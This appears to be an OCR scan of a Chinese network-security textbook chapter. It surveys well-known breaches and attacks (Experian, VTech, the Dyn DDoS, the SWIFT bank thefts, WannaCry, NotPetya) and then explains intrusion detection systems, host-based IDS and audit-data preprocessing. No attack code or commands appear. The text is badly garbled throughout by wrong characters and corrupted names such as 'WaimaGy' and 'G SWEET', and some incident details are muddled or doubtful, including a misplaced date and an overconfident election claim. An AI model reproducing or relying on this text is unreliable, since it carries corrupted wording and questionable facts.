处 理 信 用 卡 申请 的 益 百 利 (Experian) 公 司 , 其 一 个 业务 部 门 被 黑客 入 侵 , 导 人 至 1500 万 用 
户 个 人 信息 泄露 ,包括 用 户 姓名 、 出 生日 期 .地址 .社会 安全 号 .ID 号 码 ( 护 照 号 或 驾照 号 
码 ), 以 及 用 户 附加 信息 ,如 用 于 信用 评估 的 加 密 方 面 资 料 等 。T-Mobile 首席 执行 官 John 
Legere 说 ,黑客 攻陷 益 百 利 公 司 计 算 机 长 达 两 年 。 
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3 伟 易 达 Learning Lodee 网 站 %0 万 客户 资料 外 泄 

伟 易 达 (VTech) 公 司 2015 年 11 月 30 日 发 布 公告 称 , 其 运 侣 的 Learning Lodge 网 站 
客户 资料 于 2015 年 11 月 14 日 曾 遭 到 未 经 授权 者 人 侵 ,11 月 24 日 发 现 禹 料 外 泄 , 全 球 
大 约 500 万 个 顾客 账户 以 及 儿童 资料 受到 影响 。 

伟 易 达 客 户 数 据 库 包 含 一 般 的 用 户 资 料 , 如 姓名 、 电 子 邮箱 地 址 、 密 码 、 用 以 获取 密码 
的 秘密 提示 问题 和 答案 、IP 地 址 .邮寄 地 址 和 下 载 记 录 。 此 外 ,还 包括 儿童 姓名 、 性 别 和 
出 生日 期 ,但 不 包括 顾客 的 客户 信用 卡 资 料 , 也 不 包括 顾客 的 号 份 证 明文 件 资料 (如 号 份 
证 号 但 、 社 保 号 码 或 驾驶 执照 号 但 ) 。 

伟 易 达 公 司 2015 年 11 月 30 日 公告 称 , 自 2015 年 11 月 24 日 发 现 资料 外 汇 后 ,该 公 
司 展 开 了 深入 调查 ,全 面 检查 受 影响 的 网 站 ,并 采取 多 项 措施 ,以 防止 网 站 由 被 入 侵 。 

4 美国 遭 史 上 最 大 规模 DDoS 攻击 ,东海 岸 网 站 集体 瘫痪 


2016 年 10 月 ,恶意 软件 Mirai 控制 的 僵尸 网 络 对 美国 域名 服务 天 管理 服务 供应 商 
Dyn 发 起 DDoS 攻击 ,从 而 导致 许多 网 站 在 美国 东海 着 地 区 死机 ,如 GitHub、Twitter、 


PayPal 等 ,用 户 无 法 通过 域名 访问 这 些 站 点 。 
5 希拉 里 邮件 门 事件 


2015 年 3 月 《纽约 时 报 》 报 道 , 硕 拉 里 在 担任 国务 卿 期 间 私 设 邮 件 服 务 带 处 理 政府 
电子 邮件 , 且 私 自 删 除 3 万 多 封 电子 邮件 ,并 清除 痕迹 ,这 违背 了 美国 联邦 政府 要 求 政府 
官员 间 的 通信 作为 机 构 档 案 加 以 保存 的 规定 。2016 年 10 月 ,美国 联邦 调查 局 (FBI) 调 查 
希拉 里 私人 助理 胡 玛 ， 阿 们 丁 的 丈夫 时 ,在 其 计算 机 中 发 现 希 拉 里 与 其 团队 来 往 的 3 万 
多 封 电 子 邮件 ,使 得 FBI 重启 “邮件 门 ” 调 查 。2016 年 11 月 ,希拉 里 竞选 主管 的 G-mail 
邮箱 被 钓鱼 邮件 攻击 , 数 以 万 计 的 电子 邮件 被 盗 , 并 在 “维基 解密 ?上 被 公开 。 最 终 ,希拉 
里 因 ” 邮 件 门 ? 竞 选 失败 。 


G SWEET 黑客 事件 爆发 ,多 家 银行 损失 巨 款 

2016 年 2 月 ,和 孟加拉 国 中 央 银 行 在 美国 纽约 联邦 储备 银行 开设 的 账户 2 月 初 遭 黑客 
攻击 ,失窃 8100 万 美元 。 据 相关 执法 部 门 调查 ,赃款 几经 分 批 中 转 ,最 终 流入 菲律宾 两 家 
赌场 和 一 名 赌 团 中 介 商 的 账户 ,随后 很 可 能 变 成 一 堆 敌 码 , 就 此 消失 无 踪 。 而 重 加 拉 央 行 
并 非 个 案 ,2015 年 1 月 ,黑客 攻击 了 厄瓜多尔 十 方 银行 ,利用 SWIFT 系统 转移 了 1200 万 
美元 ;2015 年 年 底 ,越南 先锋 商业 股份 银行 也 被 曝 出 黑客 攻击 未 遂 案 件 。 


7 WaimaGy 勒索 病毒 席卷 全 球 

2017 年 5 月 12 日 ,一 个 称 为 “ 想 器 "(WannaCry) 的 蠕虫 式 勒 索 病 毒 在 全 球 大 范围 爆 
发 并 槛 延 ,100 多 个 国家 的 数 十 万 名 用 户 中 招 ,其 中 包括 医疗 、 教 育 等 公用 事业 单位 和 有 
名 声 的 大 公司 。 这 球 病 毒 对 计算 机 内 的 文档 、 图 片 ,程序 等 实施 高 强度 加 密 锁 定 , 并 癌 用 
户 索 取 以 比特 币 支 付 的 赎金 。 期 间 ,勒索 软件 入 侵 了 英国 45 个 公关 医疗 机 构 ,将 这 些 机 
构 的 计算 机 中 的 文件 进行 加 密 , 并 要 求 支 付 赎 金 。 医 院 计 算 机 系统 瘫痪 、 救 护 车 无 法 派 
站 , 极 有 可 能 延误 病人 治疗 ,造成 性 命 之 忧 。 

WannaCry 的 影 啊 力 来 日 其 中 一 个 汇 壤 的 Shadow Brokers Windows 漏洞 Eternal- 
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Blue。 人 微软 已 经 在 3 月 份 发 布 了 该 错误 的 MS17-010 补丁 ,但 许多 机 构 没 有 及 时 下 载 更 
新 补丁 ,因此 容易 受到 WannaCry 感染 。 


& 手机 破解 专家 Gdlebnite 公 司 被 黑 ,900GB 数据 泄露 

世界 上 最 内 名 昭 着 的 iPhone 和 设备 破解 公司 Cellebrite 在 2017 年 1 月 但 到 黑客 入 
侵 , 并 守 致 数 百 吉 字 太 的 企业 敏感 文件 章 到 泄露 。 据 悉 , 这 些 数 据 中 包含 大 量 Cellebrite 
的 用 户 资 料 ( 包 括 登 录 信息 ) ,技术 细 市 、 遭 到 破解 的 手机 数据 和 公司 设备 日 志 。 其 中 部 分 
资料 显示 该 公司 置 癌 阿 联 背 .土耳其 和 俄罗斯 等 政府 提供 手机 破解 设备 。 


9 彼 佳 / NotPstya / Netya /黄金 眼 

2017 年 6 月 ,在 WannaCry 之 后 的 一 个 月 左右 ,部 分 利用 Shadow Brokers Windows 
的 为 一 波 勒 么 软件 在 全 球 红 围 内 爆发 。 这 种 名 为 Petya、NotPetya 等 名 称 的 恶意 软件 在 
许多 方面 都 比 WannaCry 更 先进 ,但 仍然 存在 一 些 缺 陷 , 如 无 效 和 低 效 的 支付 系统 。 

园 友 软件 感染 了 多 个 国家 的 网 络 , 如 美国 制药 公司 默 殉 、 丹 麦 航 运 公 司马 士 基 等 ,其 
中 马克 兰 国家 受灾 较 严 重 。 该 勒索 软件 针对 马 殉 兰 一 系列 网 络 攻击 事件 ,扰乱 了 公用 事 
业 , 如 电力 公司 、 机 场 、 公 共 交 通 和 中 央 银 行 。 

2017 年 5 月 13 日 ,全 球 网 络 攻击 造成 数 干 台 公 司 、 机 构 和 用 户 的 计算 机 痢 到 破坏 。 
值得 一 提 的 是 ,在 德国 ,黑客 对 法 兰 克 福 火 车 站 进行 针对 性 显示 屏 攻 击 , 显 示 出 错误 页面 。 


14 ”网 络 入 侵 应 对 


安全 的 网 络 环境 是 指 在 网 络 环境 中 的 便 件 设备 和 软件 部 能 够 正 弟 有 订 地 工作 ,不 受 
任何 因 系 的 影响 。 这 种 定义 当然 只 是 在 理想 状态 下 ,在 实际 的 工作 生活 中 会 受到 日 然 、 人 
为 等 因 系 的 影响 , 古 无 法 完全 实现 的 。 但 是 ,通过 一 些 技术 手段 在 一 定时 间 内 实现 相对 的 
安全 ,让 人 们 放心 地 使 用 网 络 是 可 以 做 到 的 。 

在 网 络 安全 方面 ,国内 的 用 户 对 防火 墙 已 经 有 了 很 高 的 认 知 程度 ,而 对 入 侵 检测 系统 
的 作用 大 多 不 是 很 了 解 。 人 和信 侵 检测 系统 通过 对 行为 .安全 日 志 、 审 计数 据 或 其 他 网 络 上 可 
以 获得 的 信息 进行 操作 ,检测 到 对 系统 的 入 侵 或 者 入 侵 的 企图 。 入 侵 检 测 是 检测 和 啊 应 
计算 机 应 用 的 科学 ,其 作用 包括 威慑 、 检 测 、. 啊 应 、 损 失 情 况 评 佑 、 攻 击 预测 和 起 诉 文 持 。 
入 侵 检 测 技术 是 为 你 证 计算 机 系统 的 安全 而 设计 与 配置 的 一 种 能 够 及 时 发 现 并 报告 系统 
中 未 授权 或 异常 现象 的 技术 ,是 一 种 用 于 检测 计算 机 网 络 中 违反 安全 策略 行为 的 技术 ,可 
实时 监控 和 检测 网 络 或 系统 中 的 活动 状态 ,一 旦 发 现 网 络 中 的 可 疑 行 为 或 恶意 攻击 , 便 可 
做 出 及 时 的 报 洁 和 啊 应 ,甚至 可 以 调整 防火 场 的 配置 策略 ,与 其 进行 联动 。 

如 果 把 防火 墙 比 作 大 门 和 警卫, 入 侵 检测 就 是 网 络 中 不 间断 的 摄像 机 ,入侵 检 测 通过 穷 
路 监听 的 方式 不 间断 地 收取 网 络 数据 ,对 网 络 的 运行 和 性 能 无 任何 影 啊 ,同时 判断 其 中 征 
任 售 有 攻击 的 企图 ,通过 各 种 手段 向 定理 员 进 行 报 吉 ,不 但 可 以 发 现 从 外 部 的 攻击 ,也 可 
以 发 现 内 部 的 恶意 行为 。 所 以 ,入 侵 检测 是 网 络 安全 的 第 二 遂 曾 门 ,是 防火 墙 的 必要 补 
充 , 构 成 完整 的 网 络 安全 解决 方案 。 

目前 ,入 侵 检测 系统 已 能 为 来 日 内 外 部 的 各 种 入 侵 提 供 全 面 的 安全 防御 ,给 客户 市 来 
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识别 各 种 黑客 和 人 侵 的 方法 和 手段 .监控 内 部 人 员 的 误 操作 等 ,帮助 用 户 及 时 发 现 并 解决 安 
全 问题 和 协助 管理 员 加 强 网 络 安全 的 管理 。 


15 思考 题 


. 网络 入 侵 的 原理 是 什么 ? 

. 拒绝 攻击 服务 是 如 何 实施 的 ? 

. 秘密 扫 朱 的 原理 是 什么 ? 

. 分布 式 拒绝 服务 攻击 的 原理 征 什么 ? 
. 缓冲 区 海 出 攻击 的 原理 是 什么 ? 


5 
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21 入 侵 检 测 的 基本 概念 


“入 侵 检测 ”通常 的 定义 为 : 识别 对 计算 机 或 网 络 信 息 的 恶意 行为 ,并 对 此 行为 做 出 
啊 应 的 过 程 。 具 有 人 和 人 侵 检测 功能 的 系统 统称 为 人 侵 检 测 系统 。 和 人 侵 检 测 系 统 的 类 文 全 称 
为 Intrusion Detection System , 向 称 为 IDS。IDS 是 一 种 对 网 络 传输 进行 即时 监视 ,在 发 
现 可 疑 传输 时 发 出 警报 或 者 采取 主动 反应 措施 的 网 络 安全 设备 。 它 与 其 他 网 络 安全 设备 
的 不 同 之 处 在 于 ,IDS 是 一 种 积极 主动 的 安全 防护 技术 。IDS 最 早出 现在 1980 年 4 月 ， 
John Anderson 在 “计算 机 安全 威胁 的 监察 与 监管 ”"(Computer Security Threat Monito- 
ring and Survelllance) 中 首次 提出 和信 侵 检测 的 思想 。 几 年 以 后 ,在 1987 年 Dorothy EE. 
Denning 的 论文 4《 人 侵 检 测 模型 》( Am Intrusion Detection Mode) 中 ,IDS 的 抽象 模型 被 提 
出 。 该 论文 自 次 将 入 侵 检 测 的 概念 作为 一 种 计算 机 系统 安全 防御 问题 的 措施 被 提出 ， 
IDS 逐渐 发 展 成 为 人 侵 检 测 专 家 系统 (Intrusion Detection Expert System,1IDES)。 与 传 
统 加 密 和 访问 控制 的 常用 方法 相 比 ,IDS 是 全 新 的 计算 机 措施 。1988 年 的 莫 里 斯 蠕虫 事 
件 使 得 社会 对 计算 机 安全 从 静态 防御 提升 到 动态 防御 ,引起 了 许多 IDS 的 开发 研究 。 
1990 年 ,IDS 分 化 为 基于 网 络 的 IDS 和 基于 主机 的 IDS。 之 后 又 出 现 分 布 式 IDS。 目 前 ， 
IDS 发 展 迅 速 ,已 有 人 宣称 IDS 可 以 完全 取代 防火 墙 。 

入 侵 检测 软件 与 硬件 的 组 合 便 是 入 侵 检 测 系 统 。 一 个 合格 的 人 侵 检测 系统 能 大 大 
简化 管理 员 的 工作 ,保证 网 络 安全 运行 。 具 体 来 说 ,入 侵 检 测 系 统 的 主要 功能 包括 : 监 
视 、 分 析 用 户 及 系统 的 活动 ;系统 构造 和 弱点 的 审计 ;识别 反映 已 和 攻击 的 活动 模式 并 
回 相 关 人 士 报 警 ; 对 异 第 行为 模式 进行 统计 分 析 ; 对 重要 系统 和 数据 文件 的 完整 性 进 
行 评 佑 ;对 操作 系统 进行 审计 跟踪 管理 ;识别 用 户 违反 安全 策略 的 行为 。 和 人 侵 检 测 系 
统 的 建立 依赖 于 入 侵 检 测 技术 的 发 展 , 而 人 侵 检 测 技 术 的 价值 最 终 要 通过 实用 的 人 侵 
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通过 对 现 有 的 入 侵 检测 系统 的 入 侵 检测 技术 的 人 研究 ,可 以 从 以 下 6 个 方面 对 入 侵 检 
测 系统 进行 分 类 。 


入 侵 检 测 与 入 侵 防 得 


221 按 数据 源 分 类 
根据 检测 所 用 数据 的 来 源 可 以 将 入 侵 检测 系统 分 为 以 下 3 类. 


1 基于 主机 的 入 侵 检 测 系 统 

通常 ,基于 主机 (Host-Based) 的 入侵 检测 系统 能 够 监测 系统 、 事 件 和 操作 系统 下 的 安 
全 记录 以 及 系统 记录 。 基 于 主机 的 入 侵 检 测 系 统 ,其 检测 的 目标 系统 主要 是 主机 系统 和 
本 地 用 户 。 检 测 的 原理 是 每 个 被 保护 的 主机 系统 上 都 运行 一 个 客户 端 程序 ,用 于 实时 检 
测 系 统 中 的 信息 通信 ,如 果 根 据 主机 中 提供 的 规则 审计 出 有 入 侵 的 数据 ,立即 由 检测 系统 
的 主机 进行 分 析 ,如果 是 入 侵 行 为 , 则 及 时 进行 啊 应 。 当 有 文件 发 生变 化 时 ,入 侵 检测 系 
统 将 新 的 记录 条 目 与 攻击 标记 进行 对 比 , 看 它们 是 否 匹 配 。 如 末 匹 配 ,系统 就 问 管 理 员 报 
警 ,以 采取 措施 。 

基于 主机 的 入 侵 检 测 系 统 的 关键 点 是 审计 信息 , 即 分 析 数 据 的 准确 性 和 效率 等 。 这 
种 方法 的 最 大 弱点 是 系统 目 身 的 安全 性 ,由 于 检测 系统 的 特殊 性 ,自身 很 容易 受到 攻击 ， 
当 系 统 受到 攻击 后 ,检测 和 分 析 性 能 就 会 受到 严重 影响 。 如 果 该 主机 被 控制 ,那么 整个 内 
部 网 络 就 会 被 攻陷 。 主 机 IDS 的 存在 ,也 会 对 服务 带 的 性 能 造成 一 定 影响 。 为 外 ,这 类 
IDS 对 运行 的 环境 比较 有 针对 性 ,一 般 都 是 为 特定 的 操作 系统 开发 的 ,所 以 兼容 性 和 通用 
性 比较 差 。 

基于 主机 的 IDS 适用 于 检测 利用 操作 系统 和 应 用 程序 运行 特征 采取 的 攻击 手段 ,如 
利用 后 门 进行 的 攻击 等 。 该 系统 的 优点 是 : 通过 日 志 记 录 , 能 够 发 现 一 个 攻击 的 成 功 和 
失败 ;能 够 更 加 精密 地 监视 主机 系统 中 的 各 种 活动 ,如 对 敏感 文件 \ 目 录 , 程 序 或 端口 的 存 
取 ; 非 常 适用 于 加 密 和 交换 环境 ;不 需要 额外 的 便 件 ;能 迅速 并 准确 地 定位 入 侵 者 ,并 可 以 
结合 操作 系统 和 应 用 程序 的 行为 特征 对 入 侵 进 行 分 析 。 存 在 的 问题 是 : 依赖 于 特定 的 操 
作 系 统 和 审计 跟踪 日 志 , 系 统 的 实现 主要 针对 某 种 特定 的 系统 平台 ,可 扩展 性 .可 移植 性 
较 差 ;如 果 入 侵 者 修改 系统 核心 , 则 可 以 骗 过 基于 主机 的 人 侵 检 测 系 统 ;不 能 通过 分 析 主 
机 的 审计 记录 检测 网 络 攻 击 。 

1) 审计 数据 的 获取 

不 同 IDS 获取 数据 的 方式 不 同 , 分 布 式 IDS 是 在 多 台 主 机 上 获取 和 分 析 数 据 ; 与 之 
对 应 ,集中 式 IDS 的 数据 获取 可 以 分 布 式 进行 ,但 是 处 理 却 是 集中 进行 的 。 

通 稍 ,电子 商务 的 服务 需 系 统 采用 分 布 式 的 数据 获取 结构 。 因 为 电子 商务 的 服务 天 
一 般 对 性 能 有 很 高 的 要 求 ,尤其 是 当 获 取 的 数据 量 同 时 包含 了 基于 主机 的 数据 和 基于 网 
络 的 数据 ,会 产生 庞大 的 数据 量 , 而 且 对 应 数据 源 的 人 侵 分 析 会 有 更 复杂 的 规则 ,会 占用 
大 量 的 系统 资源 ,所 以 ,采用 分 布 式 的 结构 ,保证 数据 获取 系统 不 会 影响 电子 商务 的 正常 
反应 ,不 能 占用 过 多 的 资源 。 

数据 获取 可 划分 为 直接 监测 和 间接 监测 两 种 方法 。 

(1) 直接 监测 。 直 接 监测 从 数据 产生 或 从 属 的 对 象 直接 获取 数据 。 例 如 ,为 了 直接 
监测 主机 CPU 的 负 衙 ,必须 直接 从 主机 相应 内 核 的 结构 获得 数据 。 要 监测 inetd 进程 提 
供 的 网 络 访问 服务 ,必须 直接 从 inetd 进程 获得 关于 那些 访问 的 数据 。 
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(2) 间接 监测 。 从 反映 被 监测 对 和 象 行为 的 某 个 源 获 得 数据 。 例 如 ,间接 监测 主机 
CPU 的 负 奏 可 以 通过 读 取 一 个 记录 CPU 负 梧 的 日 志文 件 获 得 。 间 接 监测 访问 网 络 服务 
可 以 通过 读 取 inetd 进程 产生 的 日 忘 文件 或 辅助 程序 获得 。 间 接 监 测 还 可 以 通过 查看 发 
往 主机 的 特定 问 口 的 网 络 数 据 包 获得 。 

和信 侵 检测 时 , 百 接 监测 要 好 于 间接 监测 ,原因 如 下 。 

第 一 ,间接 数据 源 ( 如 审计 跟 足 ) 的 数据 可 能 在 IDS 使 用 这 些 数据 前 被 自 改 。 

第 二 ,一 些 数 据 可 能 没有 被 间接 数据 源 记 录 。 例 如 ,inetd 进程 的 每 个 行为 并 不 是 部 
记录 到 日 志文 件 ,而且 间接 数据 源 并 不 能 访问 被 监测 对 象 的 内 部 信息 ,如 TCP-Wrapper 
就 不 能 检查 inetd 进程 的 内 部 操作 ,而 只 是 通过 外 部 接口 访问 inetd 进程 的 数据 。 

第 三 ,使 用 间接 监测 ,数据 是 通过 某 些 机 制 产生 的 (例如 , 写 审计 跟踪 的 代码 ) ,这些 机 
制 并 不 知道 哪些 数据 是 IDS 真正 需要 的 。 因 此 ,间接 数据 源 通常 包含 大 量 数据 。IDS 不 
得 不 消耗 更 多 的 资源 过 小 和 减少 数据 ,然后 才能 将 处 理 后 的 数据 用 于 检测 目的 。 为 外 ,下 
接 监测 方法 仅 获 得 需要 的 信息 , 结 来 只 产生 数量 很 少 的 数据 。 此 外 ,监测 部 件 本 号 可 以 分 
析 数 据 , 只 在 检测 到 相关 事件 时 才 产 生 结 来 ,因此 实际 上 不 需要 存储 数据 ,除非 是 出 于 对 
发 生 事件 进行 事后 调查 的 目的 。 

间接 数据 源 通 党 在 数据 产生 时 刻 和 IDS 能 够 访问 这 些 数据 的 时 刻 之 间 引 入 时 延 。 
而 百 接 监测 时 延 较 短 ,确保 IDS 能 及 时 做 出 反应 。 

关于 数据 获取 系统 结构 设计 ,其 中 具有 代表 性 的 数据 获取 系统 是 AAFID(Autono- 
mous Agents for Intrusion Detection) , 它 是 一 个 主机 分 布 式 监测 的 框架 。 它 使 用 一 种 实 
体 分 层 结构 ,在 最 低层 ,AAFID 代理 在 主机 执行 监测 功能 并 向 更 高 一 层 报告 其 发 现 , 在 更 
局 一 层 处 进行 数据 缩减 。 

信 鉴 AAFID 设计 数据 获取 系统 ,代理 在 每 一 台 主 机 运行 并 从 该 主机 上 获取 数据 。 
为 了 狭 取 数据 ,最 好 下 接 从 每 全 主机 上 获取 ,系统 由 过 滤 带 、 代 理 、 数 据 源 构 成 ,大 多 数 代 
理 从 日 记 文 件 获 得 所 需 数 据 。 日 记 系 统 提供 的 均 为 间接 监测 数据 源 ,为 了 正确 获取 数据 ， 
必须 有 主机 操作 系统 的 文 持 。 

不 同 实体 连续 运行 ,不 断 获得 信息 并 寻找 入 侵 或 值得 注意 的 事件 。 大 多 数 AAFID 
代理 的 表现 形式 为 : 一 些 代 理 通过 日 志 系 统 获得 系统 信息 ,一 些 代 理 通过 网 络 接口 捕获 
数据 包 。 

数据 获取 系统 的 结构 图 如 图 2-1 所 示 。 

系统 的 审计 日 志 信 息 非 常 庞大 ,并 存在 沫 乱 性 、 重 复 性 和 不 完整 性 等 问题 。 由 于 原始 
数据 是 从 各 个 代理 服务 器 中 采集 后 送 到 中 心 检测 平台 的 ,而 各 个 代理 服务 需 的 审计 机 制 
的 配置 并 不 完全 相同 ,所 产生 的 审计 日 志 信 息 存 在 一 些 差异 ,所 以 有 些 数据 就 显得 薪 乱 无 
革 。 重 复 性 指 对 于 同一 个 客观 事物 ,系统 中 存在 多 个 物理 描述 。 不 完整 性 是 由 于 实际 系 
统 存 在 的 缺陷 以 及 一 些 人 为 因 系 所 造成 的 数据 记录 中 出 现 数 据 属性 的 值 丢 失 或 不 确定 的 
情况 。 黑 客人 侵 后 ,为 了 隐藏 其 人 侵 的 痕迹 ,经 常会 对 一 些 审计 日 志文 件 进 行 修改 ,这 样 
就 会 造成 数据 或 数据 的 条 个 数据 项 丢失 。 

因此 ,获取 审计 数据 后 ,需要 通过 数据 集成 ,数据 清洗、 数据 向 化 等 几 个 方面 对 系统 的 
审计 日 志 信 息 进 行 预 处 理 。 
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图 2-1 数据 获取 系统 的 结构 图 


2) 审计 数据 的 预 处 理 

原始 审计 数据 必须 经 过 预 处 理 , 才 能 用 于 实际 的 检测 过 程 中 。 接 下 来 介绍 审计 数据 
的 预 处 理 过 程 。 

当今 现实 世界 中 的 数据 库 极 易 受 噪声 数据 .空缺 数据 和 不 一 致 数据 的 侵扰 。 存 在 不 
完整 的 、 含 噪声 的 和 不 一 致 的 数据 是 大 型 的 .现实 世界 数据 库 或 数据 仓库 的 共同 特点 。 

入 侵 检测 系统 分 析 数 据 的 来 源 与 数据 结构 的 异 构 性 ,实际 系统 提供 数据 的 不 完全 相 
关 性 .元 余 性 .概念 上 的 模糊 性 以 及 海量 审计 数据 中 可 能 存在 大 量 的 无 意义 信息 等 问题 ， 
使 得 系统 提供 的 原始 信息 很 难 直 接 被 检测 系统 使 用 ,而 且 还 可 能 造成 检测 结果 的 偏差 , 降 
低 系统 的 检测 性 能 。 在 被 检测 模块 使 用 之 前 ,如 何 对 不 理想 的 原 怒 数据 进行 有 效 的 归纳 、 
格式 统一 .转换 和 处 理 , 是 入侵 检测 系统 需要 研究 的 关键 问题 之 一 。 

为 了 解决 这 些 问 题 , 束 出 现 了 许多 数据 预 处 理 拉 术 。 数 据 的 预 处 理 就 是 对 系统 获取 
到 的 各 种 相关 数据 进行 归纳 、 转 换 等 处 理 ,使 其 符合 系统 的 需求 。 一 般 采 用 从 大 量 的 数据 
属性 中 提取 出 部 分 对 目标 输出 有 重大 影响 的 属性 ,通过 降低 原始 数据 的 维 数 , 达 到 改善 实 
例 数据 质量 的 日 的 。 

通常, 数据 预 处 理应 该 包含 以 下 功能 : 数据 集成 ,数据 清洗 .数据 变换 .数据 简化 和 数 
据 融 合 。 上 述 功 能 如 下 所 示 。 

(1) 数据 集成 。 

数据 集成 (Data Integration) 主要 是 将 来 日 不 同 探测 天 的 结 末 或 附加 信息 进行 合并 处 
理 ,解决 语义 的 模糊 性 。 该 部 分 主要 涉及 数据 的 选择 .数据 的 冲突 以 及 数据 的 不 一 致 问题 
的 解决 。 在 网 络 人 侵 检 测 系统 中 ,可 能 存在 多 种 不 同 的 探测 套 ,针对 不 同安 全 相关 信息 进 
行 处 理 。 需 要 为 这 些 不 同 的 探测 和 右 提 供 统 一 的 数据 接口 ,以 使 遇 层 探测 带 能 够 汇总 来 日 
不 同 探测 天 的 结 末 及 其 附加 判断 信息 。 态 外 ,一 个 探测 盏 也 可 能 同时 处 理 多 个 来 日 不 同 
系统 的 审计 数据 源 , 这 些 数 据 之 间 可 能 会 存在 许多 不 一 致 的 地 方 , 如 命名 、 结 构 . 计 量 单 
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位 、 舍 义 等 ,这 驶 涉及 开 构 数据 的 格式 转换 问题 。 

总 之 ,数据 的 集成 并 非 简单 的 数据 合并 ,而 是 把 数据 进行 统一 化 和 规范 化 处 理 的 复 霖 
过 程 。 它 需要 统一 原始 数据 中 的 所 有 矛盾 之 处 (如 属性 的 同名 异 义 、 异 名 同 义 、 单 位 的 不 
统一 、 字 长 不 一 致 等 问题 )。 

(2) 数据 清洗 。 

数据 清洗 (Data Cleaning) 就 是 除去 源 数 据 集 中 的 噪声 数据 和 无 关 数 据 , 处 理 遗 源 数 
据 和 清洗 脏 数 据 , 除 去 空白 数据 域 ,考虑 时 间 顺 序 和 数据 的 变化 等 情况 ,主要 包括 重复 数 
据 以 及 忠仁 数据 的 处 理 , 开 完成 一 些 数据 类 型 的 转换 。 

(3) 数据 变换 。 

数据 变换 (Data Transformation) 主要 是 寻找 数据 的 特征 表示 ,用 维 变换 或 其 他 的 转 
化 方式 减少 有 效 变 量 的 数目 ,寻找 数据 的 不 变 式 ,包括 规格 化 ,规约 等 操作 。 规 格 化 使 数 
据 根据 其 属性 值 的 量 岗 进行 归 一 化 处 理 , 对 于 不 同 数值 属性 特点 ,一 般 可 分 为 取 值 连续 或 
取 值 离散 化 的 规格 化 问题 。 规 约 处 理 则 是 按 语 义 层 次 结构 进行 数据 合并 。 规 格 化 和 规约 
处 理 能 大 量 减少 数据 集 的 规模 , 提 局 计算 效率 。 

显然 ,数据 变换 通过 对 原始 数据 的 进一步 抽象 .组织 或 变换 等 处 理 , 能 够 为 检测 系统 
提供 更 有 效 、 精 炼 的 分 析 数 据 , 从 而 提高 检测 的 效能 。 

(4) 数据 而 化 。 

在 获取 到 的 原始 分 析 数 据 中 ,难免 会 有 一 些 对 检测 入 侵 没 有 影响 或 影响 极 小 的 数据 
属性 ,这 些 属性 的 加 入 必然 会 增 大 数据 分 析 空 间 的 维 数 ,进而 影响 检测 系统 的 检测 效率 和 
检测 实时 性 ,其 至 会 影响 检测 的 准确 性 。 这 里 的 数据 简化 (Data Reduction) 是 指 在 对 检 
测 机 制 或 数据 本 号 内 容 理解 的 基础 上 ,通过 寻找 描述 入 侵 或 系统 正当 行为 的 有 效 数据 特 
征 , 风 小 分 析 数 据 的 规模 ,在 尽 可 能 保持 分 析 数 据 原貌 的 前 提 下 最 大 限度 地 精简 数据 量 。 
最 盟 型 的 方法 是 采用 特征 选择 (Feature Selection)。 特 征 选 择 能 够 有 效 地 减少 分 析 数 据 
的 属性 ,从 而 降低 检测 空间 的 维 数 。 

(5) 数据 融合 。 

为 了 有 效 地 识别 出 针对 网 络 的 入侵 企图 ,往往 期 望 人 侵 检 测 系统 能 够 集成 人 侵 检 测 
的 多 种 技术 ,通过 对 被 监控 系统 的 不 同 级 别 ( 如 系统 级 调用 ,命令 行 、 网 络 信 息 、 网 管 信息 
以 及 应 用 程序 每) 的 审计 信息 进行 分 析 。 由 于 采用 的 是 不 同 检测 技术 和 模型 的 检测 模块 ， 
因此 在 功能 上 具有 各 目的 优势 和 不 足 。 如 傈 用 户 在 同一 系统 中 采用 多 种 分 析 .检测 机 制 ， 
针对 系统 中 不 同 的 安全 信息 进行 分 析 , 并 把 它们 的 绪 采 进行 融合 和 决策 ,必然 会 有 效 地 提 
升 系统 的 检测 率 .降低 系统 的 虚 警 率 。 

虽然 入侵 检 测 中 的 数据 融合 (Data Fusion) 问 题 早 已 被 人 意识 到 ,并 且 有 一 些 组 织 在 
致力 于 这 方面 的 研究 ,但 目前 大 多 数 商 用 入 侵 检 测 系 统 还 只 是 采用 针对 IP 包头 信息 的 签 
名 史 配 技术 ,就 是 那些 同时 支持 主机 和 网 络 环境 的 入 侵 检 测 系统 ,也 未 考虑 不 同 检测 模块 
检测 绪 末 的 相关 性 ,检测 模块 在 检测 时 的 不 合作 性 ,必然 使 具有 分 布 性 的 多 点 攻击 行为 
(如 分 布 式 拒绝 服务 ) 能 够 成 功 地 避 开 系统 的 检测 机 制 。 在 网 神 SecIDS 3600 入 侵 检 测 系 
统 用 户 手 册 中 ,介绍 DoS(Denial of Service) 是 一 种 常见 的 网 络 攻 击 方式 ,其 日 的 是 使 计 
算 机 或 网 络 无 法 提供 正常 的 服务 。 最 第 见 的 DoS 攻击 有 计算 机 网 络 带宽 攻击 和 连通 性 
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攻击 。DDoS(Distribution Denial of Service) 攻 击 通 过 网 络 过 载 干扰 或 记录 正常 的 网 络 
通信 。 通 过 回 网 络 服务 融 提 交大 量 请 求 , 导致 服务 希 超 负 人 向 。 奇 安信 软件 可 以 提供 全 局 
防护 ,包括 ARP 防护 IJP 和 网 络 层 防护 .IP 层 欺 骗 共 3 个 部 分 ,防护 分 片 洪水、 防护 IC- 
MP 洪水 防护 地 址 欺骗 ,防护 Teardrop ,防护 源 地 址 路 由 其 5 个 功能 。 

需要 踢 调 的 是 ,数据 预 处 理 的 过 程 只 是 整个 人 侵 检测 系统 的 辅助 功能 模块 , 它 是 为 人 
侵 检 测 的 核心 检测 模块 服务 的 ,因而 它 必 须 是 一 个 快速 的 数据 处 理 过 程 。 数 据 预 处 理 的 
方法 有 很 多 ,各 用 的 有 基于 粗糙 集 理 论 的 约 简 法 .基于 粗糙 集 理 论 的 属性 离散 化 .属性 的 
约 侧 等 。 

基于 主机 的 IDS 在 发 展 进程 中 已 经 引入 很 多 新 技术 。 检 测 关 键 系 统 文件 和 可 执行 
文件 的 一 个 最 普通 的 方法 束 是 定期 检查 文件 的 校 验 和 ,以 便 及 时 发 现 问 题 。 目 前 很 多 产 
品 和 都 有 奖 口 监听 的 功能 ,已 经 利用 了 部 分 的 网 络 人 侵 检 测 功 能 。 目 前 ,基于 统计 模型 的 入 
侵 检测 技术 、 基 于 专家 系统 的 人 侵 检测 技术 、 基 于 状态 转移 分 析 的 入侵 检测 技术 、 基 于 完 
整 性 检查 的 和 人 侵 检 测 技术 以 及 基于 智能 体 的 入 侵 检测 技术 都 被 提出 ,并 进行 了 应 用 。 


